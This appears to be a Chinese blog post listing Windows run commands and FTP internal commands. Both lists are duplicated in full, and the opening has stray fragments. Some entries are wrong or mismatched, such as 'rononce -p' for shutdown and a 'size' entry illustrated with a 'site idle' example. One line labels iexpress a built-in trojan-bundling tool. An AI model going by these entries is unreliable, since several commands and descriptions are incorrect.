73.?[cmd]
:同
help.
#11
十一:
7
:计算机运行命令全集
winver---------
检查
Windows
版本
wmimgmt.msc---- 打开 windows 管理体系结构
wupdmgr--------windows 更新 程序
winver--------- 检查 Windows 版本
wmimgmt.msc---- 打开 windows 管理体系结构
wupdmgr--------windows 更新 程序
wscript--------windows 脚本宿主设置
write---------- 写字板 winmsd----- 系统信息
wiaacmgr------- 扫描仪和照相机向导
winchat--------XP 自带局域网聊天
mem.exe-------- 显示内存使用情况
Msconfig.exe--- 系统配置实用 程序
mplayer2------- 简易 widnows media player
mspaint-------- 画图板
mstsc---------- 远程桌面连接
mplayer2------- 媒体播放机
magnify-------- 放大镜实用 程序
mmc------------ 打开控制台
mobsync-------- 同步命令
dxdiag--------- 检查 DirectX 信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc------- 磁盘碎片整理 程序
diskmgmt.msc--- 磁盘管理实用 程序
dcomcnfg------- 打开系统组件服务
ddeshare------- 打开 DDE 共享设置
dvdplay--------DVD 播放器
net stop messenger----- 停止信使服务
net start messenger---- 开始信使服务
notepad-------- 打开记事本
nslookup------- 网络管理的工具向导
ntbackup------- 系统备份和还原
narrator------- 屏幕 " 讲述人 "
ntmsmgr.msc---- 移动存储管理器
ntmsoprq.msc--- 移动存储管理员操作请求
netstat -an----(TC) 命令检查接口
syncapp-------- 创建一个公文包
sysedit-------- 系统配置编辑器
sigverif------- 文件签名验证 程序
sndrec32------- 录音机
shrpubw-------- 创建共享文件夹
secpol.msc----- 本地安全策略
syskey--------- 系统加密,一旦加密就不能解开,保护 windows xp 系统的双重密码
services.msc--- 本地服务设置
Sndvol32------- 音量控制 程序
sfc.exe-------- 系统文件检查器
sfc /scannow---windows 文件保护
tsshutdn-------60 秒倒计时关机命令
tourstart------xp 简介(安装完成后出现的漫游 xp程序 )
taskmgr-------- 任务管理器
eventvwr------- 事件查看器
eudcedit------- 造字 程序
explorer------- 打开资源管理器
packager------- 对象包装 程序
perfmon.msc---- 计算机性能监测 程序
progman--------程序 管理器
regedit.exe---- 注册表
rsop.msc------- 组策略结果集
regedt32------- 注册表编辑器
rononce -p ----15 秒关机
regsvr32 /u *.dll---- 停止 dll 文件运行
regsvr32 /u zipfldr.dll------ 取消 ZIP 支持
cmd.exe--------CMD 命令提示符
chkdsk.exe-----Chkdsk 磁盘检查
certmgr.msc---- 证书管理实用 程序
calc----------- 启动计算器
charmap-------- 启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用 程序
Clipbrd-------- 剪贴板查看器
conf----------- 启动 netmeeting
compmgmt.msc--- 计算机管理
cleanmgr-------** 整理
ciadv.msc------ 索引服务 程序
osk------------ 打开屏幕键盘
odbcad32-------ODBC 数据源管理器
oobe/msoobe /a---- 检查 XP 是否激活
lusrmgr.msc---- 本机用户和组
logoff--------- 注销命令
iexpress------- 木马捆绑工具,系统自带
Nslookup-------IP 地址侦测器
fsmgmt.msc----- 共享文件夹管理器
utilman-------- 辅助工具管理器
gpedit.msc----- 组策略
wmimgmt.msc---- 打开 windows 管理体系结构
wupdmgr--------windows 更新 程序
winver--------- 检查 Windows 版本
wmimgmt.msc---- 打开 windows 管理体系结构
wupdmgr--------windows 更新 程序
wscript--------windows 脚本宿主设置
write---------- 写字板 winmsd----- 系统信息
wiaacmgr------- 扫描仪和照相机向导
winchat--------XP 自带局域网聊天
mem.exe-------- 显示内存使用情况
Msconfig.exe--- 系统配置实用 程序
mplayer2------- 简易 widnows media player
mspaint-------- 画图板
mstsc---------- 远程桌面连接
mplayer2------- 媒体播放机
magnify-------- 放大镜实用 程序
mmc------------ 打开控制台
mobsync-------- 同步命令
dxdiag--------- 检查 DirectX 信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc------- 磁盘碎片整理 程序
diskmgmt.msc--- 磁盘管理实用 程序
dcomcnfg------- 打开系统组件服务
ddeshare------- 打开 DDE 共享设置
dvdplay--------DVD 播放器
net stop messenger----- 停止信使服务
net start messenger---- 开始信使服务
notepad-------- 打开记事本
nslookup------- 网络管理的工具向导
ntbackup------- 系统备份和还原
narrator------- 屏幕 " 讲述人 "
ntmsmgr.msc---- 移动存储管理器
ntmsoprq.msc--- 移动存储管理员操作请求
netstat -an----(TC) 命令检查接口
syncapp-------- 创建一个公文包
sysedit-------- 系统配置编辑器
sigverif------- 文件签名验证 程序
sndrec32------- 录音机
shrpubw-------- 创建共享文件夹
secpol.msc----- 本地安全策略
syskey--------- 系统加密,一旦加密就不能解开,保护 windows xp 系统的双重密码
services.msc--- 本地服务设置
Sndvol32------- 音量控制 程序
sfc.exe-------- 系统文件检查器
sfc /scannow---windows 文件保护
tsshutdn-------60 秒倒计时关机命令
tourstart------xp 简介(安装完成后出现的漫游 xp程序 )
taskmgr-------- 任务管理器
eventvwr------- 事件查看器
eudcedit------- 造字 程序
explorer------- 打开资源管理器
packager------- 对象包装 程序
perfmon.msc---- 计算机性能监测 程序
progman--------程序 管理器
regedit.exe---- 注册表
rsop.msc------- 组策略结果集
regedt32------- 注册表编辑器
rononce -p ----15 秒关机
regsvr32 /u *.dll---- 停止 dll 文件运行
regsvr32 /u zipfldr.dll------ 取消 ZIP 支持
cmd.exe--------CMD 命令提示符
chkdsk.exe-----Chkdsk 磁盘检查
certmgr.msc---- 证书管理实用 程序
calc----------- 启动计算器
charmap-------- 启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用 程序
Clipbrd-------- 剪贴板查看器
conf----------- 启动 netmeeting
compmgmt.msc--- 计算机管理
cleanmgr-------** 整理
ciadv.msc------ 索引服务 程序
osk------------ 打开屏幕键盘
odbcad32-------ODBC 数据源管理器
oobe/msoobe /a---- 检查 XP 是否激活
lusrmgr.msc---- 本机用户和组
logoff--------- 注销命令
iexpress------- 木马捆绑工具,系统自带
Nslookup-------IP 地址侦测器
fsmgmt.msc----- 共享文件夹管理器
utilman-------- 辅助工具管理器
gpedit.msc----- 组策略
FTP
的命令行格式为:
ftp -v -d -i -n -g [ 主机名 ] ,其中
-v 显示远程服务器的所有响应信息;
-n 限制 ftp 的自动登录,即不使用; .n etrc 文件;
-d 使用调试方式;
-g 取消全局文件名。
FTP 使用的内部命令如下 ( 中括号表示可选项 ):
1.![cmd[args]] :在本地机中执行交互 shell , exit 回到 ftp 环境,如: !ls*.zip
2.$ macro-ame[args] : 执行宏定义 macro-name 。
3.account[password] : 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file] :将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii :使用 ascii 类型传输方式。
6.bell :每个命令执行完毕后计算机响铃一次。
7.bin :使用二进制文件传输方式。
8.bye :退出 ftp 会话过程。
9.case :在使用 mget 时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir :进入远程主机目录。
11.cdup :进入远程主机目录的父目录。
12.chmod mode file-name :将远程主机文件 file-name 的存取方式设置为 mode ,如: chmod 777 a .out 。
13.close :中断与远程服务器的 ftp 会话 ( 与 open 对应 ) 。
14.cr :使用 asscii 方式传输文件时,将回车换行转换为回行。
15.delete remote-file :删除远程主机文件。
16.debug[debug-value] :设置调试方式, 显示发送至远程主机的每条命令,如: deb up 3 ,若设为 0 ,表示取消 debug 。
17.dir[remote-dir][local-file] :显示远程主机目录,并将结果存入本地文件
18.disconnection :同 close 。
19.form format :将文件传输方式设置为 format ,缺省为 file 方式。
20.get remote-file[local-file] : 将远程主机的文件 remote-file 传至本地硬盘的 local-file 。
21.glob :设置 mdelete , mget , mput 的文件名扩展,缺省时不扩展文件名,同命令行的 -g 参数。
22.hash :每传输 1024 字节,显示一个 hash 符号 (#) 。
23.help[cmd] :显示 ftp 内部命令 cmd 的帮助信息,如: help get 。
24.idle[seconds] :将远程服务器的休眠计时器设为 [seconds] 秒。
25.image :设置二进制传输方式 ( 同 binary) 。
26.lcd[dir] :将本地工作目录切换至 dir 。
27.ls[remote-dir][local-file] :显示远程目录 remote-dir , 并存入本地文件 local-file 。
28.macdef macro-name :定义一个宏,遇到 macdef 下的空行时,宏定义结束。
29.mdelete[remote-file] :删除远程主机文件。
30.mdir remote-files local-file :与 dir 类似,但可指定多个远程文件,如 : mdir *.o.*.zipoutfile 。
31.mget remote-files :传输多个远程文件。
32.mkdir dir-name :在远程主机中建一目录。
33.mls remote-file local-file :同 nlist ,但可指定多个文件名。
34.mode[modename] :将文件传输方式设置为 modename , 缺省为 stream 方式。
35.modtime file-name :显示远程主机文件的最后修改时间。
36.mput local-file :将多个文件传输至远程主机。
37.newer file-name : 如果远程机中 file-name 的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file] :显示远程主机目录的文件清单,并存入本地硬盘的 local-file 。
39.nmap[inpattern outpattern] :设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如: nmap $1.$2.$3[$1 , $2].[$2 , $3] ,则传输文件 a1.a2.a3 时,文件名变为 a1 , a2 。 该命令特别适用于远程主机为非 UNIX 机的情况。
40.ntrans[inchars[outchars]] :设置文件名字符的翻译机制,如 ntrans1R ,则文件名 LLL 将变为 RRR 。
41.open host[port] :建立指定 ftp 服务器连接,可指定连接端口。
42.passive :进入被动传输方式。
43.prompt :设置多个文件传输时的交互提示。
44.proxy ftp-cmd :在次要控制连接中,执行一条 ftp 命令, 该命令允许连接两个 ftp 服务器,以在两个服务器间传输文件。第一条 ftp 命令必须为 open ,以首先建立两个服务器间的连接。
45.put local-file[remote-file] :将本地文件 local-file 传送至远程主机。
46.pwd :显示远程主机的当前工作目录。
47.quit :同 bye ,退出 ftp 会话。
48.quote arg1 , arg2... :将参数逐字发至远程 ftp 服务器,如: quote syst.
49.recv remote-file[local-file] :同 get 。
50.reget remote-file[local-file] :类似于 get , 但若 local-file 存在,则从上次传输中断处续传。
51.rhelp[cmd-name] :请求获得远程主机的帮助。
52.rstatus[file-name] :若未指定文件名,则显示远程主机的状态, 否则显示文件状态。
53.rename[from][to] :更改远程主机文件名。
54.reset :清除回答队列。
55.restart marker :从指定的标志 marker 处,重新开始 get 或 put ,如: restart 130 。
56.rmdir dir-name :删除远程主机目录。
57.runique :设置文件名只一性存储,若文件存在,则在原文件后加后缀 .1 , .2 等。
58.send local-file[remote-file] :同 put 。
59.sendport :设置 PORT 命令的使用。
60.site arg1 , arg2... :将参数作为 SITE 命令逐字发送至远程 ftp 主机。
61.size file-name :显示远程主机文件大小,如: site idle 7200 。
62.status :显示当前 ftp 状态。
63.struct[struct-name] :将文件传输结构设置为 struct-name , 缺省时使用 stream 结构。
64.sunique :将远程主机文件名存储设置为只一 ( 与 runique 对应 ) 。
65.system :显示远程主机的操作系统类型。
66.tenex :将文件传输类型设置为 TENEX 机的所需的类型。
67.tick :设置传输时的字节计数器。
68.trace :设置包跟踪。
69.type[type-name] :设置文件传输类型为 type-name ,缺省为 ascii ,如 :type binary ,设置二进制传输方式。
70.umask[newmask] :将远程服务器的缺省 umask 设置为 newmask ,如: umask 3
71.user user-name[password][account] :向远程主机表明自己的身份,需要口令时,必须输入口令,如: user anonymous my@email 。
72.verbose :同命令行的 -v 参数,即设置详尽报告方式, ftp 服务器的所有响 应都将显示给用户,缺省为 on.
73.?[cmd] :同 help.
ftp -v -d -i -n -g [ 主机名 ] ,其中
-v 显示远程服务器的所有响应信息;
-n 限制 ftp 的自动登录,即不使用; .n etrc 文件;
-d 使用调试方式;
-g 取消全局文件名。
FTP 使用的内部命令如下 ( 中括号表示可选项 ):
1.![cmd[args]] :在本地机中执行交互 shell , exit 回到 ftp 环境,如: !ls*.zip
2.$ macro-ame[args] : 执行宏定义 macro-name 。
3.account[password] : 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file] :将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii :使用 ascii 类型传输方式。
6.bell :每个命令执行完毕后计算机响铃一次。
7.bin :使用二进制文件传输方式。
8.bye :退出 ftp 会话过程。
9.case :在使用 mget 时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir :进入远程主机目录。
11.cdup :进入远程主机目录的父目录。
12.chmod mode file-name :将远程主机文件 file-name 的存取方式设置为 mode ,如: chmod 777 a .out 。
13.close :中断与远程服务器的 ftp 会话 ( 与 open 对应 ) 。
14.cr :使用 asscii 方式传输文件时,将回车换行转换为回行。
15.delete remote-file :删除远程主机文件。
16.debug[debug-value] :设置调试方式, 显示发送至远程主机的每条命令,如: deb up 3 ,若设为 0 ,表示取消 debug 。
17.dir[remote-dir][local-file] :显示远程主机目录,并将结果存入本地文件
18.disconnection :同 close 。
19.form format :将文件传输方式设置为 format ,缺省为 file 方式。
20.get remote-file[local-file] : 将远程主机的文件 remote-file 传至本地硬盘的 local-file 。
21.glob :设置 mdelete , mget , mput 的文件名扩展,缺省时不扩展文件名,同命令行的 -g 参数。
22.hash :每传输 1024 字节,显示一个 hash 符号 (#) 。
23.help[cmd] :显示 ftp 内部命令 cmd 的帮助信息,如: help get 。
24.idle[seconds] :将远程服务器的休眠计时器设为 [seconds] 秒。
25.image :设置二进制传输方式 ( 同 binary) 。
26.lcd[dir] :将本地工作目录切换至 dir 。
27.ls[remote-dir][local-file] :显示远程目录 remote-dir , 并存入本地文件 local-file 。
28.macdef macro-name :定义一个宏,遇到 macdef 下的空行时,宏定义结束。
29.mdelete[remote-file] :删除远程主机文件。
30.mdir remote-files local-file :与 dir 类似,但可指定多个远程文件,如 : mdir *.o.*.zipoutfile 。
31.mget remote-files :传输多个远程文件。
32.mkdir dir-name :在远程主机中建一目录。
33.mls remote-file local-file :同 nlist ,但可指定多个文件名。
34.mode[modename] :将文件传输方式设置为 modename , 缺省为 stream 方式。
35.modtime file-name :显示远程主机文件的最后修改时间。
36.mput local-file :将多个文件传输至远程主机。
37.newer file-name : 如果远程机中 file-name 的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file] :显示远程主机目录的文件清单,并存入本地硬盘的 local-file 。
39.nmap[inpattern outpattern] :设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如: nmap $1.$2.$3[$1 , $2].[$2 , $3] ,则传输文件 a1.a2.a3 时,文件名变为 a1 , a2 。 该命令特别适用于远程主机为非 UNIX 机的情况。
40.ntrans[inchars[outchars]] :设置文件名字符的翻译机制,如 ntrans1R ,则文件名 LLL 将变为 RRR 。
41.open host[port] :建立指定 ftp 服务器连接,可指定连接端口。
42.passive :进入被动传输方式。
43.prompt :设置多个文件传输时的交互提示。
44.proxy ftp-cmd :在次要控制连接中,执行一条 ftp 命令, 该命令允许连接两个 ftp 服务器,以在两个服务器间传输文件。第一条 ftp 命令必须为 open ,以首先建立两个服务器间的连接。
45.put local-file[remote-file] :将本地文件 local-file 传送至远程主机。
46.pwd :显示远程主机的当前工作目录。
47.quit :同 bye ,退出 ftp 会话。
48.quote arg1 , arg2... :将参数逐字发至远程 ftp 服务器,如: quote syst.
49.recv remote-file[local-file] :同 get 。
50.reget remote-file[local-file] :类似于 get , 但若 local-file 存在,则从上次传输中断处续传。
51.rhelp[cmd-name] :请求获得远程主机的帮助。
52.rstatus[file-name] :若未指定文件名,则显示远程主机的状态, 否则显示文件状态。
53.rename[from][to] :更改远程主机文件名。
54.reset :清除回答队列。
55.restart marker :从指定的标志 marker 处,重新开始 get 或 put ,如: restart 130 。
56.rmdir dir-name :删除远程主机目录。
57.runique :设置文件名只一性存储,若文件存在,则在原文件后加后缀 .1 , .2 等。
58.send local-file[remote-file] :同 put 。
59.sendport :设置 PORT 命令的使用。
60.site arg1 , arg2... :将参数作为 SITE 命令逐字发送至远程 ftp 主机。
61.size file-name :显示远程主机文件大小,如: site idle 7200 。
62.status :显示当前 ftp 状态。
63.struct[struct-name] :将文件传输结构设置为 struct-name , 缺省时使用 stream 结构。
64.sunique :将远程主机文件名存储设置为只一 ( 与 runique 对应 ) 。
65.system :显示远程主机的操作系统类型。
66.tenex :将文件传输类型设置为 TENEX 机的所需的类型。
67.tick :设置传输时的字节计数器。
68.trace :设置包跟踪。
69.type[type-name] :设置文件传输类型为 type-name ,缺省为 ascii ,如 :type binary ,设置二进制传输方式。
70.umask[newmask] :将远程服务器的缺省 umask 设置为 newmask ,如: umask 3
71.user user-name[password][account] :向远程主机表明自己的身份,需要口令时,必须输入口令,如: user anonymous my@email 。
72.verbose :同命令行的 -v 参数,即设置详尽报告方式, ftp 服务器的所有响 应都将显示给用户,缺省为 on.
73.?[cmd] :同 help.
本文出自 “mumu NETWORK!” 博客,谢绝转载!